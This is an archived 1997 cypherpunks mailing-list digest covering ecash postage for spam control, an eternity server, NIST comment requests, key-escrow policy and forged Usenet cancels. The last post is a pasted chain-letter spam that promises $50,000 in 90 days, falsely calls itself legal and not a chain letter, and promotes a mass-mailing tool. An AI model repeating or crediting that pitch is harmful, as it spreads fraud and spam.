From: bpettigrew at usa.net (bpettigrew at usa.net)
Date: Sun, 3 Aug 1997 07:25:39 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
Message-ID: 



aba at dcs.ex.ac.uk wrote:
> OK, lets say we make emails free, unmetered, but they _must_ include 
a
> valid token for 0c.  (OK Dimitri?)
>
> Next we choose a threshold say 1000 posts per day.  Seems hard to
> imagine anyone generating manually over 1000 emails per day.  That's
> more than 1 per minute for a 10 hour day.
>
> Next when you sign up for this new email postage system, you have to
> hand over a $100 deposit.  The 0c payments are anonymous.  But if 
you
> spend over 1000 of them in one day, your identity becomes known (via 
a
> mechanism like that used for Chaum's off-line double spending
> detection protocol).  You loose $100.  To you, the spammer, the 
posts
> cost 10c each.  Your account is disabled until you pay another $100.

How would this work.  The ISP is enforcing these rules?  But the email
is not anonymous to the ISP.  Or is the email going through a 
remailer.

Why not just have an ISP say you can't send more than 1000 emails a
day.  But then what stops other ISPs from using different rules to
get the business of spammers.

--
	Bubba Pettigrew






From aba at dcs.ex.ac.uk  Sat Aug  2 17:41:59 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sun, 3 Aug 1997 08:41:59 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: 
Message-ID: <199708030035.BAA13654@server.test.net>




Bubba Pettigrew  writes:
> 
> aba at dcs.ex.ac.uk wrote:
> > OK, lets say we make emails free, unmetered, but they _must_ include 
> > a valid token for 0c.  (OK Dimitri?)
> >
> > Next we choose a threshold say 1000 posts per day.  Seems hard to
> > imagine anyone generating manually over 1000 emails per day.  That's
> > more than 1 per minute for a 10 hour day.
> >
> > Next when you sign up for this new email postage system, you have to
> > hand over a $100 deposit.  The 0c payments are anonymous.  But if 
> > you spend over 1000 of them in one day, your identity becomes known 
> > (via a mechanism like that used for Chaum's off-line double spending
> > detection protocol).  You loose $100.  To you, the spammer, the 
> > posts cost 10c each.  Your account is disabled until you pay another
> > $100.
> 
> How would this work.  The ISP is enforcing these rules?  But the email
> is not anonymous to the ISP.  Or is the email going through a 
> remailer.

The email could be delivered a number of ways, remailer, users ISP,
some other ISP's open access sendmail hub (a lot of systems you can
connect to on the SMTP port and use them as a forwarder.  Some people
use this to do crude forgeries.  Spammers like this kind of trick).

It is the recipient who is enforcing the rules indirectly because, the
recipient cashes the 0c tokens on receipt.  That way the bank gets
back all the spent tokens.

There is a neat protocol that Chaum uses in his off-line ecash
protocol which allows you to have ecash which is anonymous so long as
you don't spend it twice.  If you spend twice the bank finds out your
identity, and then penalizes you.

This protocol could be extended to have ecash which revealed your
identity if you spent more than 1000 of a given minting.  The bank
would issue a fresh mint of ecoins each day.

> Why not just have an ISP say you can't send more than 1000 emails a
> day.  

Because you can bypass your ISP once you've got PPP or SLIP running.
You can telnet to port 25 (smtp port) on any of millions of open SMTP
ports.  You could send via a remailer.

> But then what stops other ISPs from using different rules to get the
> business of spammers.

Nothing.

It is up to the recipient if he wants to join up with this anti-spam
system.  If he does all email that arrives in his email box without a
0c postage token gets bounced back to the recipient.  (You can have
some fall back so that people without signing up can still get through
to you, don't just do a blind bounce, but bounce with a nonce (random
number), so that they have to reply with that random number in the
mail, and then you'll get it.)

I'm not sure the whole thing is that practical though because of the
sheer number of TCP/IP connections required to do an online banking
protocol for each and every mail.  The bank server would melt down.

So perhaps you could have lots of banks.  The other thing that is
wrong with it is that you have to trust the banks.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0



-----BEGIN PGP SIGNED MESSAGE-----


On http://csrc.ncsl.nist.gov/ , the 3rd and 4th links are to requests for 
comments on changes to encryption standards.  Apparently, NIST isn't getting 
many comments and would really like some.

Maybe someone should tell them that publication in the Federal Register isn't 
the right way to communicate with netizens :)


+------------------------------------------------------------------+
|Carl M. Ellison       cme at acm.org    http://www.clark.net/pub/cme |
|    PGP: 61 E2 DE 7F CB 9D 79 84   E9 C8 04 8B A6 32 21 A2        |
+-Officer, officer, arrest that man. He's whistling a dirty song.--+


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBM+PSa1QXJENzYr45AQGsQAP+MgKEXEGg1irJ1FHqk8Rl26n2vMHdbOZ+
0az9sq3yIjhxM7AuV6URz6fOhOBU9Vt5pCbvhklZXNB7hF/gIogp7iXheQV1SFEs
R3EhI8zPdK7wewc2SjRPKT0ku0pvBxK35Qzn2FgVm+1F+9D7pUok6fLO+bXOTYUa
VPSk5VH3DCo=
=+xxT
-----END PGP SIGNATURE-----






From dformosa at st.nepean.uws.edu.au  Sat Aug  2 17:50:10 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Sun, 3 Aug 1997 08:50:10 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: <199708021921.UAA06401@server.test.net>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 2 Aug 1997, Adam Back wrote:

> Next we choose a threshold say 1000 posts per day.  Seems hard to
> imagine anyone generating manually over 1000 emails per day.  That's
> more than 1 per minute for a 10 hour day.

I bet this mailing list generates traffic of that order.  I would not wish
to see legitimite mailing lists shut down to stop the spam.

The best soultion given so far is Cause's suggestion of modifying the fax
law so that we can sue the spammers.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+OZaaQK0ynCmdStAQHwswP+PUSe66qf6Na6TdkrWwW3jWoorfqYIi5v
J6azAQ87dZuxMFqLuYrQ2eqq/701HNjhJdp8RcSfGEyPp4hx2wu7WwnKqCiX9HW/
7HRxJ6wkzc53DToKk6OmQp8heDJ45eFzqwVwaaItwe3P8BpN2szQiO/HXXBXDWYd
qsoP/J/GWI8=
=RugV
-----END PGP SIGNATURE-----






From azur at netcom.com  Sat Aug  2 18:40:11 1997
From: azur at netcom.com (Steve Schear)
Date: Sun, 3 Aug 1997 09:40:11 +0800
Subject: non-censorous spam control (was Re: Spam is Information?)
In-Reply-To: <199707311120.MAA00669@server.test.net>
Message-ID: 



>In a "free market" a fundamental feedback loop is that inequality of
>distribution of wealth increases -- this obviously follows from the
>fact that it is easier to make money if you have money.  With wealth
>goes control.  Thus, the ultimate end of completely unfettered free
>markets is fascism, where the wealthy run the government.  This is
>another manifestation of the fundamental conflict between democratic
>ideals and unfettered free markets.
>
>Naturally, rich, indolent technologists tend to favor schemes that
>will put them in control. :-)

I can't fuly agree. In Europe, both communism and fascism started from the
socialists (in fact, the fascist were called National Socialists) and their
premise that a free market cannot bring about the social good (including
equality) they sought, and both accept the "... idea of a political party
which embraces all activities of the individual from the cradle to the
grave, which claims to guide his views on everything, and which delights in
making all problems questions of party...," F.A. Hayek, The Road to
Surfdom. Both favor totalitarian means to this end.

In the case of the Communist, the solution is no private ownership.  In the
case of Fascism, government mandidated oligopoly, which is as far from a
free market as communism.

--Steve







From aba at dcs.ex.ac.uk  Sat Aug  2 18:44:45 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Sun, 3 Aug 1997 09:44:45 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: 
Message-ID: <199708030134.CAA13809@server.test.net>




David Formosa  writes:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Sat, 2 Aug 1997, Adam Back wrote:
> 
> > Next we choose a threshold say 1000 posts per day.  Seems hard to
> > imagine anyone generating manually over 1000 emails per day.  That's
> > more than 1 per minute for a 10 hour day.
> 
> I bet this mailing list generates traffic of that order.  I would not wish
> to see legitimite mailing lists shut down to stop the spam.

The idea is that you would exempt from postage mailing lists and
people you know.

So what happens?  Spammers target mailing lists instead.  Already
happening to some extent.

Then what?  We have to use NoCems for mailing lists, or rating
services, or judicious use of the 'd' key.

> The best soultion given so far is Cause's suggestion of modifying
> the fax law so that we can sue the spammers.

Law, and suing and the internet don't mix.

Eg. Say I spam you via an anonymous remailer.  So now who are you
going to sue?

Spammers use remailers already.

So your suggest has dire consequences for remailers.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0




I've put an eternity server up at:

	http://www.replay.com/aba/eternity/

(Alex de Joode kindly offered me an account for the purpose). 

It's running live off news.xs4all.nl newsfeed.  (replay.com is in .nl
too running off xs4all networks (I think), so it's newsfeed is fast
for replay to access).  It will check for news every 2 mins (if
someone is using it).

It's configured to read alt.anonymous.messages.

It's running eternity-0.05 (+ a few bug fixes which haven't been
packaged to produce 0.06 yet).

For instructions on posting get the latest eternity distribution off
my home page:

	http://www.dcs.ex.ac.uk/~aba/eternity/

It's not that automated yet, you have to make the posts manually,
though it will help you figure out which inline images, and links are
related to a page.  And will offer some assistance in encrypting the
documents and creating the hashes for the URLs, you still have to do a
bit of work, and you have to post the documents yourself also.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0




Anyone got some ideas for content to stuff on the eternity service?

It looks like there might be a "wired news" article, and it would be
nice to have a few tasty items on-line.

I suspect it might be a better idea to start with the milder stuff,
something which has reasonable popular support which makes governments
look stupid for trying to censor.

Things like:

	- memoirs of dead french presidents doctor
	- radikal

Other ideas?

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0



A million monkeys operating under the pseudonym 
"Dr. Dmitri Vulis, KOTM " typed:

> "William H. Geiger III"  writes:
> 
> > In <199707311120.MAA00669 at server.test.net>, on 07/31/97
> >    at 12:20 PM, Adam Back  said:
> >
> > >Another longer term way to improve the situation is to charge some small
> > >token amount per article, just to encourage people to use it with some
> > >intelligence (use cross posts rather than separately reposting to each
> > >group).
> >
> > This will not work!!!
> >
> > Charging for e-mail/news posts will no nothing to prevent spam and more
> > than likely increase the noise on such lists. It is the spamers who have
> > the money to post volumns of their crap. Allso I think you will find that
> > it will be the fanatics who will think it worth the $$$ to get their
> > message out.
> 
> In all fairness, it would decrease the "spam" because some spammers are
> certain to be unwilling to pay for braodcasting the kind of crap they
> now broadcast for a flat fee. However it would not eliminate the "spam"
> and it would damped the "signal" more than it would damped the "noise".


You guys are all forgetting the second part of the protocol-- 
receiver receives message, reads it and decides whether he 
wants to receive more mail like this one from this sender.  If
so, receiver sends the token back.


It's called "good faith deposit".


--Z






From kent at songbird.com  Sat Aug  2 20:04:41 1997
From: kent at songbird.com (Kent Crispin)
Date: Sun, 3 Aug 1997 11:04:41 +0800
Subject: RSA - the song
In-Reply-To: <199708011035.LAA01061@server.test.net>
Message-ID: <19970802195402.19993@bywater.songbird.com>



On Sat, Aug 02, 1997 at 04:46:06PM -0500, amp at pobox.com wrote:
> Interesting.
> 
> Now for the obvious question, can you convert midi back to text?

Of course -- that was the point of the exercise.  Not only that, but
midi can be used to generate sound, and pitch to midi converters can
go from sound to midi -- one way to look at this is that I've just
implemented part of an inefficient modem protocol.  However, the 
interesting thing from a legal point of view is that the intermediate 
protocol is music.  It is clearly music, in fact.  I have written 
many such compositions, and if I didn't say, you wouldn't be able to 
pick out which one was RSA by listening.

> Looks like a new way to hide encrypted messages.

I'm not sure how good it would be for that.  I find it more
entertaining as another example of the absurdity of the export ban. 

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From jito at eccosys.com  Sat Aug  2 20:09:22 1997
From: jito at eccosys.com (Joichi Ito)
Date: Sun, 3 Aug 1997 11:09:22 +0800
Subject: Joichi Ito as a Junior Policeman
Message-ID: <199708030304.MAA22318@eccosys.com>



Hi Tim.

At 23:46 97/08/01 -0700, Tim May wrote:

> And why are you helping to write a report that will be the "official
> position" of the Japanese cops?

Because, it would be much better to have it say, "we don't want key
escrow." My position on the study group is much more like making
a testimony in congress. Unlike the US, once a bill hits the floor,
it is very hard to participate. I have to participate while it is still
in the ministry level.


> The JDF is notoriously militaristic. You should reconsider this.

Again. That is exactly why I am diving in to give my opinion.
Leaving it to themselves to figure things out is probably much worse
than having someone like myself in all of the study groups giving
my frank opinion.


> And Cypherpunks should be very careful about "advising" an obviously
> co-opted member of the Japanese military and police establishment.

Again. If you want to view me as "co-opted" that's fine. Without me,
you would not have gotten Gilmore, Carl Ellison, or Whit Diffie's voice
on the record during the study group hearings. Do you think I should
just sit back and let the KEA's take over? 

> Use crypto to undermine such entities, not support them. Crypto will
> unleash anarchy on the world.

Why not let them figure it out instead of waging a war?

> You sound like a "junior policeman" to me.

Well I'm not.

> Another person to add to the killfiles.

What a productive attitude.

- Joi

P.S. I am only subscribed to cypherpunks lite. If you want to harass
me or comment, please cc my directly.


--
Finger jito at nsm.eccosys.com or jito at garage.co.jp for PGP Key
Fingerprint for RSA PGP Key ID 0x0EE23A2D
0D3A 7AAA 3DA8 E7B3  3AF1 C6FA B7ED D834
Fingerprint for DSS/Diffie-Hellman PGP Key ID 0x2D9461F1
58F3 CA9A EFB8 EB9D DF18  6B16 E48D AF2A 2D94 61F1
Home Page: http://domino.garage.co.jp/jito/joihome.nsf
To subscribe to my personal mailing list send mailto:friends-subscribe at ito.com




From tcmay at got.net  Sat Aug  2 22:11:18 1997
From: tcmay at got.net (Tim May)
Date: Sun, 3 Aug 1997 13:11:18 +0800
Subject: Duncan Long on Cypherpunks and Guns
Message-ID: 



While looking through Duncan Long's Web pages on survivalism, guns, and
such, I found this interesting mention of Cypherpunks.


This particular article is at: http://www.prairienet.org/guns/dlgs/gun3.htm
It dates from January, 1996.

His main page is accessible from there. Long is well-known for his series
of books on the M-16, Surviving Nuclear War, terrorist incidents, etc.,
mostly published by Delta Press and Paladin Press. (The kind of books
Loompanics likes to display.) He also has some views on Christianity,
Armageddon, and such...mostly I ignore these views, and am more than happy
to have him be a good Christian so long as his views are not imposed on me.
I mainly read Long for his views on guns and gun laws.

--Tim


--begin excerpt from Duncan Long's article--


Cyberpunks

At the risk of getting "flamed", I thought I'd make a few comments about
Cyberpunks. First, the definitions (using material I've lifted from
some Cyberpunks sites on the WWW). According to those that consider
themselves to be Cyberpunks, there are three main
sub-classifications of Cyberpunks. These are:

Hackers: Persons who are skilled or talented with most aspects of
computers, electronics, and technology. For hackers, technology is not just
a hobby but a way of life.

Cypherpunks: Individuals who believe that the government is out to invade
the privacy of everybody on the planet. The cypherpunk's central
goal is to out-smart the system. (The encryption program, PGP, is often
referred to by this group as "the Cypherpunk's best friend").

Ravers: Folks who use synthesized and sampled music, computer-generated
psychedelic ("cyberdelic") art, and designer drugs to create
massive all-night dance parties and love-fests in empty warehouses.

Now if you grew up during the 1960s, you'll recognize the Ravers; they're
basically hi-tech hippies. And the hackers are those darlings of the
media that show how dangerous those of us on the Internet are to society
(and give the establishment a good reason to demand more controls
on the Net, censorship, etc., etc.).

But if you go beyond the surface, especially with the Cyberpunks, you
discover that these people have a lot in common with the survival,
militia, and gun rights movements. Like us, they don't trust the
government, are using the Net (hey, you're here, aren't you?), and (yes)
even
want to own firearms to protect themselves from lack of good law
enforcement as well as run-away government agents who are apt to trample
on their rights.

There are some differences between the hard-core gun rights crowd and the
Cyberpunks. Gun owners tend to be older and a bit more
knowledgeable about government and how it does and doesn't work. And (as
might be expected) has a better grasp of which firearms are
suitable for self defense and which are Walter Mitty.

But the two groups have a lot in common, even have a lot of "members" that
belong to both groups. I think it will only be a matter of time
before Cyberpunks and gun rights groups join forces or even become one and
the same thing.

Undoubtedly this is another worry that will keep the gun grabbers and those
interested in getting rid of freedom in the US up at night.



--end excerpt from Duncan Long's article--







From dformosa at st.nepean.uws.edu.au  Sat Aug  2 22:33:48 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Sun, 3 Aug 1997 13:33:48 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 2 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> Tim Skirvin  writes:

[...]

> Look in your "control" newsgroup, and you'll see that most of the
> cancels forged for the MMFs state in the body that they're being
> cancelled because they're "illegal".

No thay state the MMF are illegal.  It dosn't say that its becuase its
illegal that there being canceled.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+Pbq6QK0ynCmdStAQG1FQP/RN8Y+Tbw6pJ2qvm0x/eiw+Vlg28Fm4Im
21Ieg3vfa2fZ/GnCnQ7mFZSTYxfN47Qyr4GSl6KO6AgA7iNiT0oKoiXKvOc6qcvx
y/Of78HcmjXrwCyfyGAGQhDi8cPcgmNRenDBMujgg03mb8Db7wNjj3wbS8OL4Nrl
UMhVwtbpGmU=
=cuRV
-----END PGP SIGNATURE-----






From apache at bear.apana.org.au  Sat Aug  2 22:39:11 1997
From: apache at bear.apana.org.au (Charles)
Date: Sun, 3 Aug 1997 13:39:11 +0800
Subject: NIST request for comments
In-Reply-To: <3.0.3.32.19970802203556.00b1e180@cybercash.com>
Message-ID: <199708030532.PAA05857@bear.apana.org.au>



-----BEGIN PGP SIGNED MESSAGE-----


   Carl Ellison said:

> On http://csrc.ncsl.nist.gov/ , the 3rd and 4th links are to requests for 
> comments on changes to encryption standards.  Apparently, NIST isn't getting 
> many comments and would really like some.

It'll only encourage them to believe they're relevant.
 
> Maybe someone should tell them that publication in the Federal Register isn't 
> the right way to communicate with netizens :)

The fact that they haven't already indicates they're dinosaurs.
- -- 
   .////.   .//    Charles Senescall             apache at bear.apana.org.au
 o:::::::::///                                   apache at quux.apana.org.au
>::::::::::\\\     Finger me @bear for PGP PUBKEY      Brisbane AUSTRALIA
   '\\\\\'   \\    Apache



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBM+QX2Hawhvoxf0r9AQEa3QgAgKxZYfGKicVg8+uZXOHGKaZSFZCPn7oe
jekWdd5w2uC6lWk+YAVrghm6qt26b98IwUy8P1Ft9cIjn4LC5kjU+A74DURlKXhZ
KtidkyUcdWAuTmGW4R0IK/1vUgusI9D5S9KO6U4iUD17PqoUCU43xz5IKHgKZodd
SlcaWFZdIhiJMkmTJaaFXAUTapm5Zszq2iZjM9yu+gFy8Gvq1+CPojrTdduzCl8w
fqxQMvK0GiinDXmAxhVdJXPk6nqQEYeSk3JIJsY/QgOfnaq8kwZYfvmfEm1LdEHz
ij2i5jhkJbsO2PFFSSz3bL5U6bR6AFQYop2qoLGgV67mNmR04OJfWg==
=AziQ
-----END PGP SIGNATURE-----






From dformosa at st.nepean.uws.edu.au  Sat Aug  2 22:47:37 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Sun, 3 Aug 1997 13:47:37 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: <6PBTae5w165w@bwalk.dm.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 2 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> Please examine Net.Scum web pages for the self-appointed censors like
> Tim Brown (http://www.netscum.net/brownt0.html)

Tim Brown is clearly rouge I don't think he has any allies I do not
think he has support from the mainstream cancelers.

[...]

> Here's one counterexample. Yes, it's in the regional relcom.* hierarchy.

You know very well that regionals are not part of UseNet.  You would have
to bring that up with the admins within the relcom.* hierarchy.

> Yes, there are lots of folks who forge cancels for "inappropriate 
> cross-posts" in the "big 8".

The standard of everdence is lower then normal for that last stament.
Please supply everdence.

[...]

> And now some friends of Tim are forging cancels for any traffic originating
> from UUNet,

We are undermineing UUNets atemp to gain a monopoly on newsgroups. :D

> irrespective of contents,

Thats what content free canceling is noramly about.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+PexaQK0ynCmdStAQH/DgP5AUJO2zosLHbJWG2PNr8tZvN/vnxCQ7XM
H/8Zz8siUVVeWbfujMbrw1SibFNv6fJ0kNRCgierpMrQF6xyWpcA40Vfd5UbjGpz
/CmX+1MS9iyzS8rFbqS2UrZ1vKFs7ycE7oOl0jKY2qAADEtn2u6iBkLLTBb0KJGH
D++k0bnpD7A=
=yl1f
-----END PGP SIGNATURE-----






From apache at bear.apana.org.au  Sat Aug  2 22:59:29 1997
From: apache at bear.apana.org.au (Charles)
Date: Sun, 3 Aug 1997 13:59:29 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: 
Message-ID: <199708030552.PAA05934@bear.apana.org.au>



   ? the Platypus {aka David Formosa} said:


>The best soultion given so far is Cause's suggestion of modifying the fax
>law so that we can sue the spammers.

Thus giving gubmints the toe in the door they are so desperately looking 
for to regulate/license/control the online world.

The first thing you would see after passing such a law (if indeed the 
original legislation itself didn't contain the provision) would be a 
requirement for identification of all accounts and account holders. 
Anonymous email and anonymous remailers would be the first victims.

Then there would be a license fee introduced to cover the costs of such a 
system (internet drivers license?), followed by calls for censorship 
which would now have much greater pseudo legitimacy. This would be only 
the crest of a very big wave. 

Spam is conveniently dealt with using procmail and other filtering tools. 
Admins generally will deal swiftly with denial of service attacks.

I'm having a problem with leaves from the neighbours trees blowing onto 
my front lawn. I think the government should DO SOMETHING.









From dformosa at st.nepean.uws.edu.au  Sat Aug  2 23:05:58 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Sun, 3 Aug 1997 14:05:58 +0800
Subject: non-censorous spam control (was Re: Spam is Information?)
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 2 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

[...]

> I'm sorry, I don't see how posting megabytes of noise every day can
> swamp the content.

You don't recall the poetry feastavil?  What about the sex groups for the
less popular fetishes?

> Moreover, if such actions were indeed cause a problem, they would not be 
> eliminated with payments. Some people would be willing to spend money to
> "flood" the net 

Here we aggry, porn4pron and others will still make a proffet from
spamming.  Infact puting a cost to posting creates a biase aggainst
unpopulare options and towards spam.  Indeed such a payment system would
make the problem worce.

> Instead of discouraging the behavior you don't like, encourage the
> behavior you do like.

[Nods]  The good old blow job prinisipul.

> I invite Adam and David to subscribe to the freedom-knights mailing list
> (send 'subscribe freedom-knights at jetcafe.org' to majordomo at jetcafe.org)
> if you want to continue this not-quite-crypto discussion there.

I have attempted to do so in the past,  and will attempt to do so again.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+PidqQK0ynCmdStAQHZawP/RS2pCTyKrsOMqHGq2BuNsdEd4Xe+qJt8
8HzSL+80yuU4wXK2MttgVyhLC91JgFJkxgllhhJxfZtn2rF+FdEJ3DwRzsC4jzm6
CwXKmoG2kAe3wZ7V5w9rTuGgblCwKjUsXlSAAFERC4eXtpeV5VvlhmUhONTrW4t4
dpxGGQawZZ8=
=PliC
-----END PGP SIGNATURE-----






From dformosa at st.nepean.uws.edu.au  Sat Aug  2 23:18:54 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Sun, 3 Aug 1997 14:18:54 +0800
Subject: non-censorous spam control (was Re: Spam is Information?)
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 2 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

[...]

> A compression scheme where many copies of the same text would be transmitted
> only once even if they're posted once would be an excellent thing

I beleave that uucp feeds can do things like this.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+PlnqQK0ynCmdStAQGHUwQAsAtIhr6HZVdHYPDll8wA3bC/QRpJ2D1A
kVZw9GwiVtaXPb54ZvkrK5qVLiwjXuMQw9kN7esxU8rUq9VPmH26Q/pAJ3AZ+AqT
TbKTr54Kxanq4+3k4fEpiYd96Q2jAywnnXxjE6z4s5PfxLBQm1GNWZ0mhnIxO4En
+ilylf2k1lM=
=gFI3
-----END PGP SIGNATURE-----






From dformosa at st.nepean.uws.edu.au  Sat Aug  2 23:22:40 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Sun, 3 Aug 1997 14:22:40 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 2 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

> Tim Skirvin  writes:

[...]

> > 	Many spam cancellers are news admins.  Most of the major ones are
> > admins, in fact - Chris Lewis, JEM, etc.
> 
> You're splitting hairs.  One very unpleasant cancel-forger, Jan Isley,
> was the admin of a site where he was also the sole user.

[...]

> Well, the third parties got complaints anyway and pulled jan's plug in
> no time. :-)

It is clear from this example that he was not a mainstream spam canceler.

> For the archetypal "spam canceller", please examine Tim Brown's

Tim Brown is not a spam canceller.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+Pn8aQK0ynCmdStAQFRKwP8D/F+uHpqIJ6up9SD1UAJ3ZL3Zlp4JzPj
eKmJec09D6Z1TuDCjtgwhH5fBswmG1JBImdJ3SUmiRqbGI7pWJJFsM+wWhq7qb2f
NFmW9LjAAjID/OkCmPK+IjDYPL86LUdvxt/wGKJxaJYqXHCiItDyCC37NsQGzIS9
wHj/0rKsfF4=
=p0nZ
-----END PGP SIGNATURE-----






From mailhost.iamerica.net at iAmerica.net  Sat Aug  2 23:26:16 1997
From: mailhost.iamerica.net at iAmerica.net (tgolf)
Date: Sun, 3 Aug 1997 14:26:16 +0800
Subject: Money Money Money!
Message-ID: <18161.235645.04703495 cypherpunks@toad.com>




You are about to make at least $50,000 - In less than 90 days Read the
enclosed program...THEN READ IT AGAIN!...
<>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>

The following income opportunity is one you may be interested in 
taking a look at.  It can be started with VERY MINIMAL outlay and the income
return is TREMENDOUS!

<>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>

The enclosed information is something I almost let slip through my fingers.
Fortunately, sometime later I re-read everything and gave some thought and
study to it.

My name is Christopher Erickson.  Two years ago, the corporation I worked at
for the past twelve years down-sized and my position was eliminated.  After
unproductive job interviews,  I decided to open my own business.  Over the
past year, I incurred many unforeseen financial problems.  I owed my family,
friends, and creditors over $35,000.  The economy was taking a toll on my
business and I just couldn't seem to make ends meet.  I had to refinance and
borrow against my home to support my family and struggling business.  I
truly believe it was wrong for me to be in debt like this.  AT THAT MOMENT
something significant happened in my life and I am writing to share my
experience in hopes that this will change your life FOREVER....FINANCIALLY!!!

In mid-December, I received this program via email.  Six months prior to
receiving this program I had been sending away for information on various
business opportunities.  All of the programs I received, in my opinion, were
not cost effective.  They were either too difficult for me to comprehend or
the initial investment was too much for me to risk to see if they worked or
not.  One claimed I'd make a million dollars in one year...it didn't tell me
I'd have to write a book to make it.

But like I was saying, in December of '95 I received this program.  I didn't
send for it, or ask for it, they just got my name off a mailing list.  THANK
GOODNESS FOR THAT!!!  After reading it several times, to make sure I was
reading it correctly, I couldn't believe my eyes.  
Here was a MONEY-MAKING PHENOMENON.  I could invest as much as I wanted to
start, without putting me further in debt.  After I got a pencil and paper
and figured it out, I would at least get my money back.  After determining
that the program is LEGAL and NOT A CHAIN LETTER, I decided "WHY NOT".

Initially I sent out 10,000 emails.  It only cost me about $15.00 for my
time on-line.  The great thing about email is that I didn't need any money
for printing to send out the program, only the cost to fulfill my orders.  I
am telling you like it is, I hope it doesn't turn you off, but I promised
myself that I would not "rip-off" anyone, no matter 
how much money it cost me!

A good program to help do this is Ready Aim Fire, an email extracting and
mass mail program 
@ http://microsyssolutions.com/raf/

In less than one week, I was starting to receive orders for REPORT #1. By
January 13th, I had received 26 orders for REPORT #1.  When you read the
GUARANTEE in the program, you will see that "YOU MUST RECEIVE 15 TO 20
ORDERS FOR REPORT #1 WITHIN TWO WEEKS.  IF YOU DON'T,  SEND OUT MORE
